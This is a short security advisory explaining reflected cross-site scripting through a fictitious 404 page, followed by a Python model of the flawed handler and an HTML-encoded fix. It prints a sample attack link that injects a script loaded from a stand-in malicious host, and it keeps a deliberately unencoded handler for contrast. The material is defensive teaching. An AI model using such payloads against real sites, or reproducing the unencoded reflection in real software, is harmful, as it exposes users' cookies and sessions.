Cross-Site Scripting (XSS)
The essence of cross-site scripting is that an attacker uses a specially crafted URL to cause a web site to return attacker-chosen content (often script or HTML) to a victim's web browser; the form shown here, in which the payload travels in the request and is reflected back in the response, is usually called reflected XSS. An attacker may use social engineering techniques to entice the user to click on the specially crafted URL. Because the browser cannot tell the injected script from the site's own, the malicious script runs with the privileges of a legitimate script originating from the legitimate web site: it can read that site's cookies and DOM and make requests in the victim's name. Many web applications are vulnerable to such a technique. The following example uses a fictitious XSS vulnerability in a default error page.
For example, a valid URL request might be
However, if the requested document "FILENAME.html" did not exist, the web site could return an error message such as
404 page not found: FILENAME.html
Notice that "FILENAME.html" is a string that was supplied by the user and is included, unmodified, in the page the web site returns straight to the client's browser.
If a malicious web site offered a link to example.com that looked something like this
<A HREF="http://www.example.com/<script%20SRC='http://www.malicioussite.com/evilscript.js'></script>">Click Here</a>
then the "FILENAME.html" submitted to example.com is the <script> tag itself (the %20 in the link is decoded back to a space by the server), and example.com uses its ordinary routines to generate an error page for the victim that reads
<HTML> 404 page not found: <script SRC='http://www.malicioussite.com/evilscript.js'></script> .... </HTML>
The ultimate fix to this problem involves recoding a very large number of web sites so that they properly validate the input they receive and, above all, properly encode output for the context it is placed in (HTML body, attribute, script, URL) before returning it to the user or acting upon it. Output encoding is the control that actually prevents the injected string from being parsed as markup; input validation (for example, accepting only characters that can appear in a real file name) is worthwhile defense in depth but is not sufficient on its own. This process is a very large undertaking.
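The following is an added example, not code from the original advisory or from any real web server, modelling the fictitious 404 handler above in its vulnerable and hardened forms. The function names, the `MALICIOUS_URL` sample (constructed from the link shown above) and the file-name allowlist are assumptions made for illustration.

```python
# Added example: a minimal model of the fictitious error page described above.
# The handler names and the allowlist pattern are illustrative assumptions.
import re
from html import escape
from urllib.parse import unquote, urlsplit

# Constructed sample: the attacker's link from the text, %20 still URL-encoded.
MALICIOUS_URL = (
    "http://www.example.com/"
    "<script%20SRC='http://www.malicioussite.com/evilscript.js'></script>"
)

# Illustrative allowlist for a plausible document name (assumption, not a standard).
FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def requested_path(url: str) -> str:
    """Return the decoded path a server would look up, leading '/' stripped.

    This is the "FILENAME.html" string of the article: whatever follows the
    host in the URL, after percent-decoding (so %20 becomes a space).
    """
    return unquote(urlsplit(url).path).lstrip("/")


def render_404_vulnerable(filename: str) -> str:
    """The flawed error page: user input concatenated straight into HTML."""
    return f"<HTML> 404 page not found: {filename} .... </HTML>"


def render_404_fixed(filename: str) -> str:
    """Same page with the user-controlled string HTML-encoded for element-body
    context. '<', '>', '&' and quotes become entities, so the browser renders
    the attacker's text as text instead of parsing it as a script element."""
    return f"<HTML> 404 page not found: {escape(filename, quote=True)} .... </HTML>"


def is_plausible_filename(filename: str) -> bool:
    """Defense in depth: reject names that cannot be real documents. Not a
    substitute for output encoding, since a rejected request still needs an
    error page and that page must encode whatever it echoes."""
    return FILENAME_RE.fullmatch(filename) is not None


def contains_script_element(page: str) -> bool:
    """Crude indicator used here to show whether a live <script> tag survived
    into the response. Real scanners parse the HTML; this only demonstrates."""
    return "<script" in page.lower()


def handle_request(url: str, encode_output: bool = True) -> str:
    """Simulate the server: look up the path (always missing in this model)
    and return a 404 page, either encoded or reflected raw."""
    name = requested_path(url)
    if encode_output:
        return render_404_fixed(name)
    return render_404_vulnerable(name)


if __name__ == "__main__":
    print("vulnerable:", handle_request(MALICIOUS_URL, encode_output=False))
    print("fixed:     ", handle_request(MALICIOUS_URL))
```

Run as a script, the first line printed reproduces the poisoned error page from the article; the second shows the same response with the tag neutralised into `&lt;script ...&gt;`. The allowlist check is separate on purpose: validation decides whether to serve the request, encoding decides how any echoed string is emitted, and only the latter closes the injection.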
Last updated July 2, 2007